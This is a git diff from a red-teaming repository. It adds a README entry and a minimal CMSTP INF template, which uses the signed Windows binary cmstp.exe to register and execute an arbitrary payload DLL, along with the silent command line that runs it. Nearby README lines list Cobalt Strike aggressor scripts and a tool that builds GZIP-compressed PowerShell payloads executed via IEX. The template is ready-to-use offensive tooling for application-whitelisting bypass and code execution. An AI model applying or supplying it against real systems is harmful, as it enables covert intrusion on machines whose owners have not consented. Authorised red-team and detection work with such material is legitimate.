diff --git a/red-teaming/README.md b/red-teaming/README.md index 266ae00..ce4bd27 100644 --- a/red-teaming/README.md +++ b/red-teaming/README.md @@ -44,6 +44,12 @@ FullLanguage - **`clickOnceSharpPickTemplate.cs`** - This is a template for **C# Console Project** containing [SharpPick](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) technique of loading Powershell code from within C# application. The ClickOnce concept is to generate a windows self-updating Application that is specially privileged ([ClickOnce](https://www.slideshare.net/NetSPI/all-you-need-is-one-a-click-once-love-story-secure360-2015)) +- **`cmstp-template.inf`** - INF file being a smallest possible template for **CMSTP** code execution technique, as described by [LOLBAS project](https://lolbas-project.github.io/lolbas/Binaries/Cmstp/). Sample usage: + +``` +cmstp.exe /ni /s cmstp.inf +``` + - **`cobalt-arsenal`** - A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. That includes couple of my handy utils I've used on various engagements. - **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX) diff --git a/red-teaming/cmstp-template.inf b/red-teaming/cmstp-template.inf new file mode 100644 index 0000000..b2c7033 --- /dev/null +++ b/red-teaming/cmstp-template.inf @@ -0,0 +1,12 @@ +[version] +signature=$chicago$ + +[defaultinstall_singleuser] +registerocxs=r + +[r] +C:\fully\qualified\path\to\payload.dll + +[strings] +servicename=foobar +shortsvcname=foobar \ No newline at end of file